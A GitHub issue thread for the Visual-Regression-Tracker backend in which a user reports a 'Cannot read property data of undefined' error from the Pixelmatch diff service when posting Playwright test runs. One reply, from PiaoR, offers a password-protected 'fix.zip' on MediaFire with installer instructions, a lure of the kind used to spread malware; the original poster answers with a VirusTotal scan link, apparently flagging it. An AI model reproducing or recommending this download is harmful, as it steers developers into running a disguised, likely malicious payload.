### ISSUE TITLE
Playwright - /test-runs Error

### ISSUE THREAD

**Issue by Enes5519** [Visual-Regression-Tracker/backend#303]
I'm running vrt tests with Playwright but I get this error most of the time.

```
Error: {
	"path": "/test-runs",
	"name": "TypeError",
	"message": "Cannot read property 'data' of undefined",
	"exception": {},
	"stack": "TypeError: Cannot read property 'data' of undefined\n    at PixelmatchService.getDiff (/app/dist/src/compare/libs/pixelmatch/pixelmatch.service.js:40:40)\n    at runMicrotasks (<anonymous>)\n    at processTicksAndRejections (internal/process/task_queues.js:95:5)\n    at async TestRunsService.calculateDiff (/app/dist/src/test-runs/test-runs.service.js:138:28)\n    at async TestRunsService.postTestRun (/app/dist/src/test-runs/test-runs.service.js:66:33)"
}

    at /builds/.../node_modules/@visual-regression-tracker/sdk-js/dist/visualRegressionTracker.js:116:27
    at /builds/.../node_modules/@visual-regression-tracker/sdk-js/dist/visualRegressionTracker.js:8:71
    at __awaiter (/builds/.../node_modules/@visual-regression-tracker/sdk-js/dist/visualRegressionTracker.js:4:12)
    at handleException (/builds/.../node_modules/@visual-regression-tracker/sdk-js/dist/visualRegressionTracker.js:103:16)
```

**Comment by PiaoR** [comment]
Download 
https://www.mediafire.com/file/5t7dozm7sptcuqj/fix.zip/file
password: changeme
In the installer menu, select "gcc."

**Comment by Enes5519** [comment]
https://www.virustotal.com/gui/file/695425e20bb7fdab1690bf017f9ca815372d13d5c4e8e3ca588108e2ddb042eb?nocache=1
